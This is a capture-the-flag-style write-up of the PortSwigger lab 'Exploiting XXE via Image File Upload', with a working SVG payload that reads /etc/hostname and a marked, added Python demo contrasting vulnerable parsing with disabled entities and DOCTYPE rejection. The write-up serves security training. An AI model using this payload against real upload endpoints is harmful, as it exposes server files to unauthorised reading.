This is the eighth article in our series on XML external entity (XXE) injection vulnerabilities. In this article, we solve the PortSwigger Web Security Academy lab "Exploiting XXE via Image File Upload." If you haven't read the earlier parts, you can find them by searching our website.
Lab Description Of Exploiting XXE Via Image File Upload
In this lab, users can post comments on blog posts and attach an avatar image to the comment. The avatar is processed server-side with the Apache Batik library.
To solve the lab, we need to upload an image that, after processing, displays the contents of the "/etc/hostname" file. Once we have read the hostname, we submit it to complete the lab.
First, access the lab. Once you are in, open any blog post.
At the bottom of the post there is a comment form, and the form also lets us attach an avatar. We will exploit this lab through the avatar upload.
We need an SVG file. SVG is an XML-based image format, so the uploaded avatar is fed to an XML parser, and that is what turns an image upload into an XXE vector.
I have already saved the following file as "exploit.svg" on my system; this is the payload we will use.
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Copy the code above and save it as "exploit.svg" on your system.
If you can read XML, the payload is straightforward. The DOCTYPE declares an external entity named "xxe" whose value is the contents of "file:///etc/hostname" on the lab server, and the "&xxe;" reference inside the <text> element makes the parser substitute that content into the SVG. When Batik renders the image, the hostname is drawn as visible text. Now it's time to exploit the vulnerability with this file.
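To show what happens inside the parser without the lab, here is an added example that is not part of the original article and not Batik's code: Python's expat-based SAX parser stands in for Batik, the hostname file is replaced by a constructed temporary file, and the same SVG is parsed three ways, with external entities resolved (the vulnerable behaviour the lab relies on), with external entities disabled, and with any DOCTYPE rejected outright. The function names and the constructed hostname value "demo-host-01" are assumptions made for the example.

```python
"""Local demonstration of the SVG/XXE mechanism (added example, not lab code).

Python's xml.sax (expat) stands in for Apache Batik; a temp file stands in
for /etc/hostname. Nothing here talks to the lab server.
"""
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


def build_payload(file_uri: str) -> bytes:
    """Return the article's exploit.svg, parameterised on the file to read."""
    return (
        '<?xml version="1.0" standalone="yes"?>'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{file_uri}" > ]>'
        '<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
        '<text font-size="16" x="0" y="16">&xxe;</text></svg>'
    ).encode()


class TextCollector(ContentHandler):
    """Collects character data inside <text>, i.e. what a renderer would draw."""

    def __init__(self):
        super().__init__()
        self.in_text = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "text":
            self.in_text = True

    def endElement(self, name):
        if name == "text":
            self.in_text = False

    def characters(self, content):
        if self.in_text:
            self.parts.append(content)

    @property
    def text(self) -> str:
        return "".join(self.parts).strip()


class RejectDoctype:
    """SAX lexical handler that aborts parsing as soon as a DOCTYPE appears.

    Refusing DTDs entirely is the standard hardening for XXE: no DTD means
    no entity declarations at all, internal or external.
    """

    def startDTD(self, name, public_id, system_id):
        raise ValueError(f"DOCTYPE '{name}' rejected: DTDs are not allowed in uploads")

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def render_text(svg: bytes, resolve_external: bool, allow_doctype: bool = True) -> str:
    """Parse the SVG and return the text that would be drawn in the image."""
    parser = xml.sax.make_parser()
    # True reproduces the vulnerable behaviour: SYSTEM entities are fetched.
    parser.setFeature(feature_external_ges, resolve_external)
    if not allow_doctype:
        parser.setProperty(property_lexical_handler, RejectDoctype())
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(svg))
    return handler.text


def demo() -> dict:
    """Run the payload against a constructed stand-in for /etc/hostname."""
    fd, path = tempfile.mkstemp(prefix="fake_hostname_")
    with os.fdopen(fd, "w") as fh:
        fh.write("demo-host-01\n")  # constructed value, not a real hostname
    try:
        payload = build_payload(Path(path).as_uri())  # file:///tmp/fake_hostname_...
        results = {
            "vulnerable": render_text(payload, resolve_external=True),
            "no_external_entities": render_text(payload, resolve_external=False),
        }
        try:
            render_text(payload, resolve_external=True, allow_doctype=False)
            results["doctype_rejected"] = False
        except ValueError:
            results["doctype_rejected"] = True
        return results
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode, value in demo().items():
        print(f"{mode:>22}: {value!r}")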
Now I fill in the comment form, attach "exploit.svg" as the avatar, and click "Post Comment." The page shows the message "Thank you for your comment," which tells us the comment was accepted. Let's go back to the post and see how the comment is rendered: click "Back to Blog."
My comment appears at the end of the post. In the two screenshots shown side by side, I have right-clicked my avatar and opened it in a new window. The rendered image contains the text "b10cde35944c," which is the contents of /etc/hostname on the lab server, that is, its hostname. Now we submit that value as the solution.
With the hostname accepted, we have solved the PortSwigger Web Security Academy lab "Exploiting XXE via Image File Upload." Congratulations!
If you want to learn more about web security, explore our website and open the "Web Security" section in the Cybersecurity menu, where you will find all of our web security material.
To continue, move on to the next lab, "Exploiting XXE to Retrieve Data by Repurposing a Local DTD," but finish the current lab before starting it. Good luck!